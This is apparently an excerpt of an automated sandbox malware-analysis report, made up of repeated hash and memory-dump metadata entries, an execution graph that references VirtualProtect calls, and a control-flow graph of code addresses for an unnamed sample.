                                                            • Opcode Fuzzy Hash: ccddfc5e53e39d7e1a93e4f42d89ed24c73481f5a7c4f7daa152e20df6e488b0
                                                            • Instruction Fuzzy Hash: 2D310911B0C91D0FE768B7AC686A6F937C1DF5833AB1545BAF80EC71EBDD18AC418285
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9bac0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5a89aa17dfd5deb89b85de88c08948d140a6231edf3c66bd37127a28544f21e1
                                                            • Instruction ID: 70a0f6db54a360188ce6a4090b8b19623948eff3f8e3936ba062cb46c5b9346a
                                                            • Opcode Fuzzy Hash: 5a89aa17dfd5deb89b85de88c08948d140a6231edf3c66bd37127a28544f21e1
                                                            • Instruction Fuzzy Hash: 37210720B1D91D0FE798BB6C98AD77976C2EFA8325B1501B9E80EC32F7DD58EC014285
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9bac0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 282cae9a143f4622e0a540099dcf379b444d737811570b1761f24c71ae24ff60
                                                            • Instruction ID: 6232a6ee1ba154aa45c98d274a48c3799ed8f82e070dd118b993a15d4f5e3d64
                                                            • Opcode Fuzzy Hash: 282cae9a143f4622e0a540099dcf379b444d737811570b1761f24c71ae24ff60
                                                            • Instruction Fuzzy Hash: 49210736B0E29D8EE732B7A898210FC7B60EF52325F1546F7D0588B1D3D9782646C785
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9baf1000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 76e38f11f65c023ded165b7cbb1cf1f3cf5aaa1894ba66bfe8f3699b24bae64a
                                                            • Instruction ID: e8aea4efe69c8578b3a31833d440f61e0039920344dcf12b01f539ab34b48750
                                                            • Opcode Fuzzy Hash: 76e38f11f65c023ded165b7cbb1cf1f3cf5aaa1894ba66bfe8f3699b24bae64a
                                                            • Instruction Fuzzy Hash: A221C932B0DB1D4FEBA8EB98C4A56E87B92EF58350F514179F40DC72D2CD686C818780
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9bad0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cdef844f12f920abc1ef62980aaeee823d5270a88780230653e038959cdc3b2c
                                                            • Instruction ID: d2ccb91710f8b1d0d86efbe440b08b8d31b7b8d88e76b249edfce80e39987984
                                                            • Opcode Fuzzy Hash: cdef844f12f920abc1ef62980aaeee823d5270a88780230653e038959cdc3b2c
                                                            • Instruction Fuzzy Hash: 4321A331B1DA594FE7A4EB6888A52A873E1EFA8300F1441B9D44DD32A2CE787D418741
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9baf1000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cad79af15adc241d54b52634ead2a2fa9c67bbb0770eb2aae80ff70459b8fe9b
                                                            • Instruction ID: c9b81c76ec41fdc27235f9e4d7b2937196cfde3ee7e9ec13c3d615b90891e3e8
                                                            • Opcode Fuzzy Hash: cad79af15adc241d54b52634ead2a2fa9c67bbb0770eb2aae80ff70459b8fe9b
                                                            • Instruction Fuzzy Hash: 6F118F2064F3C19FCB179B3488689957FA0AF53211B0E41EED4C5CF0B3DA6C494AC712
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9bac0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 62247cb1923992ab7f3d26ff3fed4a09d206575a2d37f4b10ad2492eba0a89d6
                                                            • Instruction ID: 9add72f30b78143f4e56f4c93ebd0a5c042984612b0b1661b3d7f9b6b8e7518a
                                                            • Opcode Fuzzy Hash: 62247cb1923992ab7f3d26ff3fed4a09d206575a2d37f4b10ad2492eba0a89d6
                                                            • Instruction Fuzzy Hash: 74116330B19A1D4BEAB8FBA884646B87391FF54300F0240B5D04ED72A2DE686D418640
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9bac0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b77012e9039cef6cc03c662a162a4683eb87986ab557e6b1e9d2fcf242dcc9c8
                                                            • Instruction ID: e106ebd95293c1084b195be4d8ff97ed263f22c2324668b0df0935aa0d8c4429
                                                            • Opcode Fuzzy Hash: b77012e9039cef6cc03c662a162a4683eb87986ab557e6b1e9d2fcf242dcc9c8
                                                            • Instruction Fuzzy Hash: CF115121F1EA1E5BEBB4BB9884646F87291FF48710F1241B6D40ED32F2DE686E408684
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9bac0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dd32da3510a1faae4a88e14863e60193701451b867cbb8e9c6f92da329bfd9e2
                                                            • Instruction ID: 1b9747539f708727d44b7d65a9f82ec26f364abf85bc3239327c11e9c796ca08
                                                            • Opcode Fuzzy Hash: dd32da3510a1faae4a88e14863e60193701451b867cbb8e9c6f92da329bfd9e2
                                                            • Instruction Fuzzy Hash: B611FE30D0892C8FDBA8EB08C494BA973E1EB64310F2541A9D44ED3271CF74AEC5CB45
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9bac0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 424b02f25d0f1bd62d8f118f5512d131a6e7f5df956964b40833f60d7102a1be
                                                            • Instruction ID: a1fcf0526f4a7f0b9b3f264133566e383ddf75fbb8755962c1c89f108d694b69
                                                            • Opcode Fuzzy Hash: 424b02f25d0f1bd62d8f118f5512d131a6e7f5df956964b40833f60d7102a1be
                                                            • Instruction Fuzzy Hash: 5D111E21F1A90E8FEFB4FBB8846967822C1EFA5711F4644B5E00EC72F2DDA8AD414704
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9bac0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 918b7d752593cc348d4f2274dc79c8c348aa27978c0e5d4f18cc1b2361844c09
                                                            • Instruction ID: bd2a8209fd0a6f1bd1eb819c90fc8457cc3c7fdd755ef7dcfd3a3d21039bdd36
                                                            • Opcode Fuzzy Hash: 918b7d752593cc348d4f2274dc79c8c348aa27978c0e5d4f18cc1b2361844c09
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9baf1000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d3fa799343420fc2f7fb740c623fb9b4f5aab2b078573fd9b9dceea2072441a2
                                                            • Instruction ID: 65aec5663ad2742d356b1a54043c2dd432b3c2062ecb00ab5a9225a1fa98eef4
                                                            • Opcode Fuzzy Hash: d3fa799343420fc2f7fb740c623fb9b4f5aab2b078573fd9b9dceea2072441a2
                                                            • Instruction Fuzzy Hash: 6AE04F2154E3C44FC70B973088788503F609E2721078A41EEC145CF2B3E6298849C702
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9bac0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9af5bc28fc2c0f0b71dd5e592dfd76922cbb1878aa8f2e7de69573f6f38a7678
                                                            • Instruction ID: 1e7ea4726f0590c06b16de3dc9349bf9a163589073d4b6c201e5a33f5b902515
                                                            • Opcode Fuzzy Hash: 9af5bc28fc2c0f0b71dd5e592dfd76922cbb1878aa8f2e7de69573f6f38a7678
                                                            • Instruction Fuzzy Hash: 51E01220F0901E4BFBB4B794C8607B962A1AF94300F1240B4D80D933E2DDB86F814749
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9bac0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a694a85e57c89b96afa3afa0940e3ba856f579c8a2424d16d51d4f95c1ccaad7
                                                            • Instruction ID: ed0e61b198001209f818b04ed4d54ac883336c0034daeb39cc2ad2099b5da0ca
                                                            • Opcode Fuzzy Hash: a694a85e57c89b96afa3afa0940e3ba856f579c8a2424d16d51d4f95c1ccaad7
                                                            • Instruction Fuzzy Hash: 47E0EC24F0A80E8FEEA4FBA880786B822C29F54710F0A40B4E40DC72B2DDA8A9014704
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAE3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9bae3000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 89f6b807177e1225d16e7df19c848799da2258c7ea209a9a332e77e5e1de8161
                                                            • Instruction ID: 37edc7076fc4c2e28668e714698bc654a96485dc4b70f56e8cf4b7ad10628b33
                                                            • Opcode Fuzzy Hash: 89f6b807177e1225d16e7df19c848799da2258c7ea209a9a332e77e5e1de8161
                                                            • Instruction Fuzzy Hash: 23C0121275E81D0A7598B15C38521F883C2D7C813571513F3E00DC328ADC0A598302C4
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9baf1000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                            • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                            • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                            • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9baf1000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9f89cb3f62b3182ca9adc3d9aed498fb5175fa03025083ebc1b10905a140eb21
                                                            • Instruction ID: fc53cdff608347623775037792c106689762831bf29b6ef07b9df21540533fd9
                                                            • Opcode Fuzzy Hash: 9f89cb3f62b3182ca9adc3d9aed498fb5175fa03025083ebc1b10905a140eb21
                                                            • Instruction Fuzzy Hash: 13D02230B509040FC70CA73888588703790EB6A202B8200A8D00AC72B1D9AADC89C741
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9baf1000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e90708a79087e72b77d4e0fa24157253c780a8196c08309517985a8ca87fb076
                                                            • Instruction ID: 93ada8c3559bb867e47995193bd0202fb733a6a8fa3329ca9ccae7e0f10ffa3a
                                                            • Opcode Fuzzy Hash: e90708a79087e72b77d4e0fa24157253c780a8196c08309517985a8ca87fb076
                                                            • Instruction Fuzzy Hash: 9BD01234B519044FCB1CA7388859C747791EBAA216BD540A9D00AC73B1D96ADD89C741
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9bac0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e936795df280284fbe1680a90c07a03b5b2cd9b3a8fad33150715f2f2d6be2e3
                                                            • Instruction ID: 4129fd0d51a785f1061e2ea5148f07247befa67b87b118e53b1d9063a8df5a84
                                                            • Opcode Fuzzy Hash: e936795df280284fbe1680a90c07a03b5b2cd9b3a8fad33150715f2f2d6be2e3
                                                            • Instruction Fuzzy Hash: 93C01214B5740D51D03473AEEC664F97740AF48118F864171E40D85096DC491587C2DA
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9bac0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2e3223773806dd1eeb8a33bfc36a23128a0ee8a43556ffbef35106e3682b1600
                                                            • Instruction ID: 050d8e8814590b799ee996d36945032e3fad8cecaae2ead40cbd6cb78caa5bea
                                                            • Opcode Fuzzy Hash: 2e3223773806dd1eeb8a33bfc36a23128a0ee8a43556ffbef35106e3682b1600
                                                            • Instruction Fuzzy Hash: 2EC0123062A80E8FDA80BB28C889824BBA0FB0E201BDA00E0E00CC71A1D65A98908700
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9bac0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 607a3deceb6852d5288b94f2c8b9b075914afb68c719db66ca5244cb50052f0a
                                                            • Instruction ID: 2234e022e19ea5219197fb4616ed885ec4011342f418d6e6b18645ffdf65eab9
                                                            • Opcode Fuzzy Hash: 607a3deceb6852d5288b94f2c8b9b075914afb68c719db66ca5244cb50052f0a
                                                            • Instruction Fuzzy Hash: 3FC08C00F0F40F40F83037EE14220BCB1005BC4A10FD30132D04C820E19CDE22C5418E
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9bac0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2382abb1d8bd13a368f4ec6879c0849fc741086f48c87de85cd1e1eef6468543
                                                            • Instruction ID: 1ddb80e099fe518b4f19929de4c47b9be299ca1b253c48f0a35bf6161c62484f
                                                            • Opcode Fuzzy Hash: 2382abb1d8bd13a368f4ec6879c0849fc741086f48c87de85cd1e1eef6468543
                                                            • Instruction Fuzzy Hash: 5CC01210F2AD0E0BEEF8B3B880392FC00C26F44B00F620034E00ED32E3DDAC2A404A84
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9bad0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cc3f8e72630c80a729c6a5733f170a9b71b42a4221c4276c24c4315fbdda3be2
                                                            • Instruction ID: 209770f3f9a3f57c00c020382ae85afd256a65f6a4c24d2cb60b502e3045faf9
                                                            • Opcode Fuzzy Hash: cc3f8e72630c80a729c6a5733f170a9b71b42a4221c4276c24c4315fbdda3be2
                                                            • Instruction Fuzzy Hash: 24D0C930E09618CEEBA0DB64C851B68B7B2FF48310F5002F6C01DE22CACB356D819B40
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9bac0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 718b1564b16caac23f9bfb190fb5655060b47aeae2b11378fdbc4b44aac16134
                                                            • Instruction ID: 8ddf7f94e45fc8c7d4c3fd6111a0a5cb673ed710da835738426777e9fa29f40f
                                                            • Opcode Fuzzy Hash: 718b1564b16caac23f9bfb190fb5655060b47aeae2b11378fdbc4b44aac16134
                                                            • Instruction Fuzzy Hash: F7C04C01F1CC2A07E65976184C2567E04535F54729FD501B4F41F873DFCD5D5D0206C6
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9bac0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1331302ace8906dc7ff6d84222f3b4709e12167f194fc678014da51f1390e612
                                                            • Instruction ID: b00b1116aa25af495023ca70037b5d0b26bb27b9196e46cda1e400c7530b80a8
                                                            • Opcode Fuzzy Hash: 1331302ace8906dc7ff6d84222f3b4709e12167f194fc678014da51f1390e612
                                                            • Instruction Fuzzy Hash: 92B01200D5F44F40E83433FB095217870405B44104FC20170D40CD119198CE12944286
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9bad0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1249c1b0514c7178be080b616e912f9abb5f72fd4ef16b669b0acf00b4ae93e6
                                                            • Instruction ID: a84aa108b41ec2fe9044ace8939f3ab70d8be2d6593a8267f9aa5b5f908a2e05
                                                            • Opcode Fuzzy Hash: 1249c1b0514c7178be080b616e912f9abb5f72fd4ef16b669b0acf00b4ae93e6
                                                            • Instruction Fuzzy Hash: 9AA00204E9780E01D81832FB1E970A474505FA9154FC61960E80985196FCCE5BE90393
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9baf1000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c7d2018242a0126bf40494a73c7f59b4a5ac1d0e95081e02a01ac1a34b36981f
                                                            • Instruction ID: 2b18dceb9d33b39305405c3ad9930cbe0a3ac247b75680c48a129e04e1d765a3
                                                            • Opcode Fuzzy Hash: c7d2018242a0126bf40494a73c7f59b4a5ac1d0e95081e02a01ac1a34b36981f
                                                            • Instruction Fuzzy Hash: EBA00144E6692E01A91832BA4A965A53CA25A88295FC901A1A948881D7E88D52EA12A2
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9bac0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cac71e77d6b68aa96a6892ae0be65438d06d493e10b968ad6f9787162aca6423
                                                            • Instruction ID: 08126a0ba31587a5188420524d8baa40e4e82ab567600cd11480db9608fdb9cf
                                                            • Opcode Fuzzy Hash: cac71e77d6b68aa96a6892ae0be65438d06d493e10b968ad6f9787162aca6423
                                                            • Instruction Fuzzy Hash: B8B09201F0E12B46F1B032D4052937902D00F70344F0B0438D80C872E2FDDCAE010149
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9bac0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: c9$!k9$"s9$#{9
                                                            • API String ID: 0-1692736845
                                                            • Opcode ID: 85c06e23354b5e73a81d95539ee200d0fde7fdbb8bb3cd475c1631cb099e5e18
                                                            • Instruction ID: 579273eef08cfa2f0780210e9b83f76135f4f5566ba582a9906b28aa7542d3a7
                                                            • Opcode Fuzzy Hash: 85c06e23354b5e73a81d95539ee200d0fde7fdbb8bb3cd475c1631cb099e5e18
                                                            • Instruction Fuzzy Hash: E4514C06B1A46A45E339B7FD78219FD6B449FA927FB0843B7F85D8E0C74C486085C2E9

                                                            Execution Graph

                                                            Execution Coverage:2.3%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:15
                                                            Total number of Limit Nodes:2
                                                            execution_graph 19750 7ffd9bab6a8c 19752 7ffd9bab28b2 19750->19752 19752->19750 19753 7ffd9bab0998 19752->19753 19753->19752 19754 7ffd9babac20 19753->19754 19755 7ffd9babac79 19754->19755 19757 7ffd9bab12b0 19754->19757 19755->19752 19758 7ffd9bab12b9 19757->19758 19759 7ffd9babaf08 19758->19759 19760 7ffd9babb265 VirtualProtect 19758->19760 19759->19755 19761 7ffd9babb29e 19760->19761 19761->19755 19762 7ffd9bab1171 19764 7ffd9bab1147 19762->19764 19763 7ffd9bab1168 19764->19762 19764->19763 19765 7ffd9babb265 VirtualProtect 19764->19765 19766 7ffd9babb29e 19765->19766

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 0 7ffd9bab12b0-7ffd9babadad 3 7ffd9babadf9-7ffd9babadfc 0->3 4 7ffd9babadaf-7ffd9babadf6 0->4 5 7ffd9babae6f-7ffd9babaed2 3->5 6 7ffd9babadfe-7ffd9babae25 3->6 4->3 17 7ffd9babaeda-7ffd9babaf06 call 7ffd9babaf2a 5->17 18 7ffd9babaed4 5->18 6->5 10 7ffd9babae27-7ffd9babae2a 6->10 12 7ffd9babae2c-7ffd9babae3f 10->12 13 7ffd9babae64-7ffd9babae6c 10->13 15 7ffd9babae43-7ffd9babae56 12->15 16 7ffd9babae41 12->16 13->5 15->15 19 7ffd9babae58-7ffd9babae60 15->19 16->15 22 7ffd9babaf08-7ffd9babaf0e 17->22 23 7ffd9babaf52 17->23 18->17 19->13 24 7ffd9babaf15-7ffd9babaf29 22->24 25 7ffd9babaf10 22->25 26 7ffd9babafcc-7ffd9babafed 23->26 27 7ffd9babaf54-7ffd9babaf58 23->27 25->24 30 7ffd9babb039-7ffd9babb042 26->30 31 7ffd9babafef-7ffd9babb038 26->31 28 7ffd9babaf63-7ffd9babaf74 27->28 29 7ffd9babaf5e call 7ffd9bab03d8 27->29 29->28 32 7ffd9babb09d-7ffd9babb104 30->32 33 7ffd9babb044-7ffd9babb053 30->33 31->30 44 7ffd9babb106 32->44 45 7ffd9babb10c-7ffd9babb138 call 7ffd9babb15c 32->45 33->32 34 7ffd9babb055-7ffd9babb058 33->34 36 7ffd9babb05a-7ffd9babb06d 34->36 37 7ffd9babb092-7ffd9babb09a 34->37 39 7ffd9babb06f 36->39 40 7ffd9babb071-7ffd9babb084 36->40 37->32 39->40 40->40 42 7ffd9babb086-7ffd9babb08e 40->42 42->37 44->45 48 7ffd9babb13a-7ffd9babb140 45->48 49 7ffd9babb184 45->49 50 7ffd9babb147-7ffd9babb15b 48->50 51 7ffd9babb142 48->51 52 7ffd9babb186-7ffd9babb1a6 call 7ffd9bab03d8 49->52 53 7ffd9babb1fe-7ffd9babb1ff 49->53 51->50 55 7ffd9babb249-7ffd9babb29c VirtualProtect 53->55 56 7ffd9babb201-7ffd9babb248 53->56 61 7ffd9babb29e 55->61 62 7ffd9babb2a4-7ffd9babb2cc 55->62 56->55 61->62
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.2052101559.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_7ffd9bab0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 241be47043f3815376a9bf1ba960381c7fc596b0ebe22152b862b96c166b1138
                                                            • Instruction ID: af4c5cee42d62f1a8051b42122ca30f63647531a79044b700b9f9568156d8502
                                                            • Opcode Fuzzy Hash: 241be47043f3815376a9bf1ba960381c7fc596b0ebe22152b862b96c166b1138
                                                            • Instruction Fuzzy Hash: 3CF1C231A0CA4D8FDB58EF58D8567F977E1FB58311F00423AE85EC32A2DE75A9418B81

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.2052101559.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_7ffd9bae1000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: M
